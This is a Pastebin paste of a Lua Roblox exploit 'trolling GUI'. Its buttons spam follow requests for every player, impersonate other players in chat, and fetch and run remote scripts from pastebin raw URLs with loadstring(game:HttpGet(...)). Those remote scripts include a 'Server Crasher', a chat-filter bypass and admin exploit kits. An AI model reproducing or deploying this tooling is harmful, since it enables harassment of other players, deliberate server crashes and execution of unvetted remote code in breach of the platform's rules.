Advertisement
BlastingStone

Untitled

Jan 12th, 2020
296
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 15.73 KB | None | 0 0
  1. --[[
  2.     ____  __           __  _             _____ __                
  3.    / __ )/ /___ ______/ /_(_)___  ____ _/ ___// /_____  ____  ___
  4.   / __  / / __ `/ ___/ __/ / __ \/ __ `/\__ \/ __/ __ \/ __ \/ _ \
  5.  / /_/ / / /_/ (__  ) /_/ / / / / /_/ /___/ / /_/ /_/ / / / /  __/
  6. /_____/_/\__,_/____/\__/_/_/ /_/\__, //____/\__/\____/_/ /_/\___/
  7.                                /____/ Made by BlastingStone#8878
  8. ]]--
  9.  
  10. game:GetService("StarterGui"):SetCore("SendNotification",{Title="Loaded!",Text=X and"SETTINGS CHANGED!"or"Made by BlastingStone.\n My 1st trolling GUI. Made for testing my scripting skills.",Duration=20,Button1="Alright."})
  11.  
  12. -- Instances:
  13.  
  14. local ScreenGui = Instance.new("ScreenGui")
  15. local Frame = Instance.new("Frame")
  16. local NameOfScript = Instance.new("TextLabel")
  17. local ImageLabel = Instance.new("ImageLabel")
  18. local Version = Instance.new("TextLabel")
  19. local FollowAll = Instance.new("TextButton")
  20. local R6Pipis = Instance.new("TextButton")
  21. local Note = Instance.new("TextLabel")
  22. local FlyingOrbs = Instance.new("TextButton")
  23. local ChatTroll = Instance.new("TextButton")
  24. local ServerCrasher = Instance.new("TextButton")
  25. local ChatByp = Instance.new("TextButton")
  26. local AnotherTrollGui = Instance.new("TextButton")
  27. local Shattervast = Instance.new("TextButton")
  28. local InfiniteYield = Instance.new("TextButton")
  29. local Close = Instance.new("TextButton")
  30. local FE_EnabledDisabled = Instance.new("TextLabel")
  31.  
  32. --Properties:
  33.  
  34. ScreenGui.Parent = game.CoreGui
  35. ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
  36.  
  37. Frame.Active = true
  38. Frame.Draggable = true
  39. Frame.Parent = ScreenGui
  40. Frame.BackgroundColor3 = Color3.new(0.509804, 0.509804, 0.509804)
  41. Frame.BorderColor3 = Color3.new(0, 0, 0)
  42. Frame.BorderSizePixel = 3
  43. Frame.Position = UDim2.new(0.274410784, 0, 0.206552744, 0)
  44. Frame.Size = UDim2.new(0, 479, 0, 411)
  45.  
  46. NameOfScript.Name = "NameOfScript"
  47. NameOfScript.Parent = Frame
  48. NameOfScript.BackgroundColor3 = Color3.new(1, 1, 1)
  49. NameOfScript.BackgroundTransparency = 1
  50. NameOfScript.Position = UDim2.new(0.0195221007, 0, 0.0272019468, 0)
  51. NameOfScript.Size = UDim2.new(0, 200, 0, 50)
  52. NameOfScript.Font = Enum.Font.Arcade
  53. NameOfScript.Text = "some dumb trolling gui"
  54. NameOfScript.TextColor3 = Color3.new(0, 0, 0)
  55. NameOfScript.TextScaled = true
  56. NameOfScript.TextSize = 14
  57. NameOfScript.TextWrapped = true
  58.  
  59. ImageLabel.Parent = Frame
  60. ImageLabel.BackgroundColor3 = Color3.new(1, 1, 1)
  61. ImageLabel.BackgroundTransparency = 1
  62. ImageLabel.Position = UDim2.new(0.774579465, 0, 0.729927003, 0)
  63. ImageLabel.Size = UDim2.new(0, 107, 0, 110)
  64. ImageLabel.Image = "http://www.roblox.com/asset/?id=4492172626"
  65.  
  66. Version.Name = "Version"
  67. Version.Parent = Frame
  68. Version.BackgroundColor3 = Color3.new(1, 1, 1)
  69. Version.BackgroundTransparency = 1
  70. Version.Position = UDim2.new(0.154555887, 0, 0.148400247, 0)
  71. Version.Size = UDim2.new(0, 136, 0, 16)
  72. Version.Font = Enum.Font.Code
  73. Version.Text = "v0.7 / BlastingStone#8878"
  74. Version.TextColor3 = Color3.new(0, 0, 0)
  75. Version.TextSize = 14
  76.  
  77. FollowAll.Name = "FollowAll"
  78. FollowAll.Parent = Frame
  79. FollowAll.BackgroundColor3 = Color3.new(1, 1, 1)
  80. FollowAll.BorderSizePixel = 3
  81. FollowAll.Position = UDim2.new(0.0279605929, 0, 0.252499998, 0)
  82. FollowAll.Size = UDim2.new(0, 125, 0, 35)
  83. FollowAll.Font = Enum.Font.Cartoon
  84. FollowAll.Text = "Follow All"
  85. FollowAll.TextColor3 = Color3.new(0, 0, 0)
  86. FollowAll.TextSize = 14
  87.  
  88. R6Pipis.Name = "R6Pipis"
  89. R6Pipis.Parent = Frame
  90. R6Pipis.BackgroundColor3 = Color3.new(1, 1, 1)
  91. R6Pipis.BorderSizePixel = 3
  92. R6Pipis.Position = UDim2.new(0.0279605929, 0, 0.425833315, 0)
  93. R6Pipis.Size = UDim2.new(0, 125, 0, 35)
  94. R6Pipis.Font = Enum.Font.Cartoon
  95. R6Pipis.Text = "R6 Pipis"
  96. R6Pipis.TextColor3 = Color3.new(0, 0, 0)
  97. R6Pipis.TextSize = 14
  98.  
  99. Note.Name = "Note"
  100. Note.Parent = Frame
  101. Note.BackgroundColor3 = Color3.new(1, 1, 1)
  102. Note.BackgroundTransparency = 1
  103. Note.Position = UDim2.new(0.290444702, 0, 0.876368582, 0)
  104. Note.Size = UDim2.new(0, 200, 0, 50)
  105. Note.Font = Enum.Font.Code
  106. Note.Text = "I'm sorry for this script."
  107. Note.TextColor3 = Color3.new(0, 0, 0)
  108. Note.TextSize = 14
  109.  
  110. FlyingOrbs.Name = "FlyingOrbs"
  111. FlyingOrbs.Parent = Frame
  112. FlyingOrbs.BackgroundColor3 = Color3.new(1, 1, 1)
  113. FlyingOrbs.BorderSizePixel = 3
  114. FlyingOrbs.Position = UDim2.new(0.0279605929, 0, 0.602916658, 0)
  115. FlyingOrbs.Size = UDim2.new(0, 125, 0, 35)
  116. FlyingOrbs.Font = Enum.Font.Cartoon
  117. FlyingOrbs.Text = "R6 Flying Orbs"
  118. FlyingOrbs.TextColor3 = Color3.new(0, 0, 0)
  119. FlyingOrbs.TextSize = 14
  120.  
  121. ChatTroll.Name = "ChatTroll"
  122. ChatTroll.Parent = Frame
  123. ChatTroll.BackgroundColor3 = Color3.new(1, 1, 1)
  124. ChatTroll.BorderSizePixel = 3
  125. ChatTroll.Position = UDim2.new(0.368475348, 0, 0.252499998, 0)
  126. ChatTroll.Size = UDim2.new(0, 125, 0, 35)
  127. ChatTroll.Font = Enum.Font.Cartoon
  128. ChatTroll.Text = "Chat Troll"
  129. ChatTroll.TextColor3 = Color3.new(0, 0, 0)
  130. ChatTroll.TextSize = 14
  131.  
  132. ServerCrasher.Name = "ServerCrasher"
  133. ServerCrasher.Parent = Frame
  134. ServerCrasher.BackgroundColor3 = Color3.new(1, 1, 1)
  135. ServerCrasher.BorderSizePixel = 3
  136. ServerCrasher.Position = UDim2.new(0.369704425, 0, 0.425833315, 0)
  137. ServerCrasher.Size = UDim2.new(0, 125, 0, 35)
  138. ServerCrasher.Font = Enum.Font.Cartoon
  139. ServerCrasher.Text = "Server Crasher"
  140. ServerCrasher.TextColor3 = Color3.new(0, 0, 0)
  141. ServerCrasher.TextSize = 14
  142.  
  143. ChatByp.Name = "ChatByp"
  144. ChatByp.Parent = Frame
  145. ChatByp.BackgroundColor3 = Color3.new(1, 1, 1)
  146. ChatByp.BorderSizePixel = 3
  147. ChatByp.Position = UDim2.new(0.369704425, 0, 0.602916658, 0)
  148. ChatByp.Size = UDim2.new(0, 125, 0, 35)
  149. ChatByp.Font = Enum.Font.Cartoon
  150. ChatByp.Text = "Chat Bypass"
  151. ChatByp.TextColor3 = Color3.new(0, 0, 0)
  152. ChatByp.TextSize = 14
  153.  
  154. AnotherTrollGui.Name = "AnotherTrollGui"
  155. AnotherTrollGui.Parent = Frame
  156. AnotherTrollGui.BackgroundColor3 = Color3.new(1, 1, 1)
  157. AnotherTrollGui.BorderSizePixel = 3
  158. AnotherTrollGui.Position = UDim2.new(0.706457436, 0, 0.600483596, 0)
  159. AnotherTrollGui.Size = UDim2.new(0, 125, 0, 35)
  160. AnotherTrollGui.Font = Enum.Font.Cartoon
  161. AnotherTrollGui.Text = "Another troll gui"
  162. AnotherTrollGui.TextColor3 = Color3.new(0, 0, 0)
  163. AnotherTrollGui.TextSize = 14
  164.  
  165. Shattervast.Name = "Shattervast"
  166. Shattervast.Parent = Frame
  167. Shattervast.BackgroundColor3 = Color3.new(1, 1, 1)
  168. Shattervast.BorderSizePixel = 3
  169. Shattervast.Position = UDim2.new(0.706457436, 0, 0.250066906, 0)
  170. Shattervast.Size = UDim2.new(0, 125, 0, 35)
  171. Shattervast.Font = Enum.Font.Cartoon
  172. Shattervast.Text = "Shattervast"
  173. Shattervast.TextColor3 = Color3.new(0, 0, 0)
  174. Shattervast.TextSize = 14
  175.  
  176. InfiniteYield.Name = "InfiniteYield"
  177. InfiniteYield.Parent = Frame
  178. InfiniteYield.BackgroundColor3 = Color3.new(1, 1, 1)
  179. InfiniteYield.BorderSizePixel = 3
  180. InfiniteYield.Position = UDim2.new(0.706457436, 0, 0.423400223, 0)
  181. InfiniteYield.Size = UDim2.new(0, 125, 0, 35)
  182. InfiniteYield.Font = Enum.Font.Cartoon
  183. InfiniteYield.Text = "Infinite Yield"
  184. InfiniteYield.TextColor3 = Color3.new(0, 0, 0)
  185. InfiniteYield.TextSize = 14
  186.  
  187. Close.Name = "Close"
  188. Close.Parent = Frame
  189. Close.BackgroundColor3 = Color3.new(1, 1, 1)
  190. Close.BorderSizePixel = 3
  191. Close.Position = UDim2.new(0.895615876, 0, 0, 0)
  192. Close.Size = UDim2.new(0, 50, 0, 50)
  193. Close.Font = Enum.Font.Code
  194. Close.Text = "X"
  195. Close.TextColor3 = Color3.new(0, 0, 0)
  196. Close.TextScaled = true
  197. Close.TextSize = 14
  198. Close.TextWrapped = true
  199.  
  200. FE_EnabledDisabled.Name = "FE_EnabledDisabled"
  201. FE_EnabledDisabled.Parent = Frame
  202. FE_EnabledDisabled.BackgroundColor3 = Color3.new(1, 1, 1)
  203. FE_EnabledDisabled.BackgroundTransparency = 1
  204. FE_EnabledDisabled.Position = UDim2.new(0.344535023, 0, 0.875894189, 0)
  205. FE_EnabledDisabled.Size = UDim2.new(0, 136, 0, 16)
  206. FE_EnabledDisabled.Font = Enum.Font.Code
  207. FE_EnabledDisabled.Text = "FE is unknown."
  208. FE_EnabledDisabled.TextColor3 = Color3.new(0, 0, 0)
  209. FE_EnabledDisabled.TextSize = 14
  210.  
  211. -- Scripts:
  212.  
  213. local function WMLOWQ_fake_script() -- NameOfScript.LocalScript
  214.     local script = Instance.new('LocalScript', NameOfScript)
  215.  
  216.     function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  217.    
  218.     counter = 0
  219.    
  220.     while wait(0.1)do
  221.      script.Parent.TextColor3 = Color3.fromHSV(zigzag(counter),1,1)
  222.      
  223.      counter = counter + 0.01
  224.     end
  225. end
  226. coroutine.wrap(WMLOWQ_fake_script)()
  227. local function QEWER_fake_script() -- FollowAll.LocalScript
  228.     local script = Instance.new('LocalScript', FollowAll)
  229.  
  230.     function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  231.    
  232.     counter = 0
  233.    
  234.     while wait(0.1)do
  235.      script.Parent.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1)
  236.      
  237.      counter = counter + 0.01
  238.     end
  239. end
  240. coroutine.wrap(QEWER_fake_script)()
  241. FollowAll.MouseButton1Click:connect(function() -- FollowAll.LocalScript
  242.     game:GetService("StarterGui"):SetCore("SendNotification",{Title="Loaded!",Text=X and"SETTINGS CHANGED!"or"Succesfully loaded!",Duration=20})  
  243.     local RobloxReplicatedStorage = game:GetService('RobloxReplicatedStorage')
  244.     local RemoteEvent_NewFollower = RobloxReplicatedStorage:WaitForChild('NewFollower')
  245.     while wait(0) do
  246.     for i,v in pairs(game.Players:GetChildren()) do
  247.     RemoteEvent_NewFollower:FireServer(v, true)
  248.     end
  249.     end
  250. end)
  251. local function TYRGWP_fake_script() -- R6Pipis.LocalScript
  252.     local script = Instance.new('LocalScript', R6Pipis)
  253.  
  254.     function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  255.    
  256.     counter = 0
  257.    
  258.     while wait(0.1)do
  259.      script.Parent.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1)
  260.      
  261.      counter = counter + 0.01
  262.     end
  263. end
  264. coroutine.wrap(TYRGWP_fake_script)()
  265. R6Pipis.MouseButton1Click:connect(function() -- R6Pipis.LocalScript
  266.     game:GetService("StarterGui"):SetCore("SendNotification",{Title="Loaded!",Text=X and"SETTINGS CHANGED!"or"Succesfully loaded!",Duration=20})  
  267.     loadstring(game:HttpGet(('https://pastebin.com/raw/VBNjM0nh'),true))()
  268. end)
  269. local function OQNZBW_fake_script() -- Note.LocalScript
  270.     local script = Instance.new('LocalScript', Note)
  271.  
  272.     function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  273.    
  274.     counter = 0
  275.    
  276.     while wait(0.1)do
  277.      script.Parent.TextColor3 = Color3.fromHSV(zigzag(counter),1,1)
  278.      
  279.      counter = counter + 0.01
  280.     end
  281. end
  282. coroutine.wrap(OQNZBW_fake_script)()
  283. local function JSVD_fake_script() -- Frame.LocalScript
  284.     local script = Instance.new('LocalScript', Frame)
  285.  
  286.     function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  287.    
  288.     counter = 0
  289.    
  290.     while wait(0.1)do
  291.      script.Parent.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1)
  292.      
  293.      counter = counter + 0.01
  294.     end
  295. end
  296. coroutine.wrap(JSVD_fake_script)()
  297. local function IKYJRKY_fake_script() -- FlyingOrbs.LocalScript
  298.     local script = Instance.new('LocalScript', FlyingOrbs)
  299.  
  300.     function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  301.    
  302.     counter = 0
  303.    
  304.     while wait(0.1)do
  305.      script.Parent.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1)
  306.      
  307.      counter = counter + 0.01
  308.     end
  309. end
  310. coroutine.wrap(IKYJRKY_fake_script)()
  311. FlyingOrbs.MouseButton1Click:connect(function() -- FlyingOrbs.LocalScript
  312.     game:GetService("StarterGui"):SetCore("SendNotification",{Title="Loaded!",Text=X and"SETTINGS CHANGED!"or"Succesfully loaded!",Duration=20})  
  313.     loadstring(game:HttpGet(('https://pastebin.com/raw/UrxVQURH'),true))()
  314. end)
  315. local function BEYKNZX_fake_script() -- ChatTroll.LocalScript
  316.     local script = Instance.new('LocalScript', ChatTroll)
  317.  
  318.     function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  319.    
  320.     counter = 0
  321.    
  322.     while wait(0.1)do
  323.      script.Parent.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1)
  324.      
  325.      counter = counter + 0.01
  326.     end
  327. end
  328. coroutine.wrap(BEYKNZX_fake_script)()
  329. ChatTroll.MouseButton1Click:connect(function() -- ChatTroll.LocalScript
  330.     game:GetService("StarterGui"):SetCore("SendNotification",{Title="Loaded!",Text=X and"SETTINGS CHANGED!"or"Succesfully loaded!",Duration=20})  
  331.     local Action = game.Players:GetPlayers()
  332.      for i = 1,#Action do
  333.     Action[i].Chatted:connect(function(Message)
  334.      game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("".."["..Action[i].Name.."]".." "..Message, "All")
  335.      end)
  336.     end
  337.     end)
  338. local function XPLFXCK_fake_script() -- ServerCrasher.LocalScript
  339.     local script = Instance.new('LocalScript', ServerCrasher)
  340.  
  341.     function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  342.    
  343.     counter = 0
  344.    
  345.     while wait(0.1)do
  346.      script.Parent.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1)
  347.      
  348.      counter = counter + 0.01
  349.     end
  350. end
  351. coroutine.wrap(XPLFXCK_fake_script)()
  352. ServerCrasher.MouseButton1Click:connect(function() -- ServerCrasher.LocalScript
  353.     loadstring(game:HttpGet(('https://pastebin.com/raw/VSeqmt5t'),true))()
  354. end)
  355. local function RVXZO_fake_script() -- ChatByp.LocalScript
  356.     local script = Instance.new('LocalScript', ChatByp)
  357.  
  358.     function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  359.    
  360.     counter = 0
  361.    
  362.     while wait(0.1)do
  363.      script.Parent.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1)
  364.      
  365.      counter = counter + 0.01
  366.     end
  367. end
  368. coroutine.wrap(RVXZO_fake_script)()
  369. ChatByp.MouseButton1Click:connect(function() -- ChatByp.LocalScript
  370.     game:GetService("StarterGui"):SetCore("SendNotification",{Title="Loaded!",Text=X and"SETTINGS CHANGED!"or"Succesfully loaded!",Duration=20})  
  371.     loadstring(game:HttpGet(('https://pastebin.com/raw/Wh0DUEdn'),true))()
  372. end)
  373. local function GQDG_fake_script() -- AnotherTrollGui.LocalScript
  374.     local script = Instance.new('LocalScript', AnotherTrollGui)
  375.  
  376.     function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  377.    
  378.     counter = 0
  379.    
  380.     while wait(0.1)do
  381.      script.Parent.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1)
  382.      
  383.      counter = counter + 0.01
  384.     end
  385. end
  386. coroutine.wrap(GQDG_fake_script)()
  387. AnotherTrollGui.MouseButton1Click:connect(function() -- AnotherTrollGui.LocalScript
  388.     game:GetService("StarterGui"):SetCore("SendNotification",{Title="Loaded!",Text=X and"SETTINGS CHANGED!"or"Succesfully loaded!",Duration=20})  
  389.     loadstring(game:HttpGet(('https://pastebin.com/raw/QBYzwGtQ'),true))()
  390. end)
  391. local function AXUDA_fake_script() -- Shattervast.LocalScript
  392.     local script = Instance.new('LocalScript', Shattervast)
  393.  
  394.     function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  395.    
  396.     counter = 0
  397.    
  398.     while wait(0.1)do
  399.      script.Parent.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1)
  400.      
  401.      counter = counter + 0.01
  402.     end
  403. end
  404. coroutine.wrap(AXUDA_fake_script)()
  405. Shattervast.MouseButton1Click:connect(function() -- Shattervast.LocalScript
  406.     game:GetService("StarterGui"):SetCore("SendNotification",{Title="Loaded!",Text=X and"SETTINGS CHANGED!"or"Succesfully loaded!",Duration=20})  
  407.     loadstring(game:HttpGet(('https://pastebin.com/raw/TE7fz2m9'),true))()
  408. end)
  409. local function DFJD_fake_script() -- InfiniteYield.LocalScript
  410.     local script = Instance.new('LocalScript', InfiniteYield)
  411.  
  412.     function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
  413.    
  414.     counter = 0
  415.    
  416.     while wait(0.1)do
  417.      script.Parent.BorderColor3 = Color3.fromHSV(zigzag(counter),1,1)
  418.      
  419.      counter = counter + 0.01
  420.     end
  421. end
  422. coroutine.wrap(DFJD_fake_script)()
  423. InfiniteYield.MouseButton1Click:connect(function() -- InfiniteYield.LocalScript
  424.     game:GetService("StarterGui"):SetCore("SendNotification",{Title="Loaded!",Text=X and"SETTINGS CHANGED!"or"Succesfully loaded!",Duration=20})  
  425.     loadstring(game:HttpGet(('https://pastebin.com/raw/MjBzRjmT'),true))()
  426. end)
  427. Close.MouseButton1Click:connect(function() -- Close.LocalScript
  428.     game:GetService("StarterGui"):SetCore("SendNotification",{Title="Loaded!",Text=X and"SETTINGS CHANGED!"or"Succesfully loaded!",Duration=20})  
  429.     script.Parent.Parent:Destroy()
  430. end)
  431. local function EVHVG_fake_script() -- FE_EnabledDisabled.LocalScript
  432.     local script = Instance.new('LocalScript', FE_EnabledDisabled)
  433.  
  434.     if game.Workspace.FilteringEnabled == false then
  435.         FE_EnabledDisabled.Text = "FE is disabled."
  436.         FE_EnabledDisabled.TextColor3 = Color3.fromRGB(200,10,10)
  437.     else
  438.         FE_EnabledDisabled.Text = "FE is enabled."
  439.         FE_EnabledDisabled.TextColor3 = Color3.fromRGB(10,200,10)
  440.     end
  441. end
  442. coroutine.wrap(EVHVG_fake_script)()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement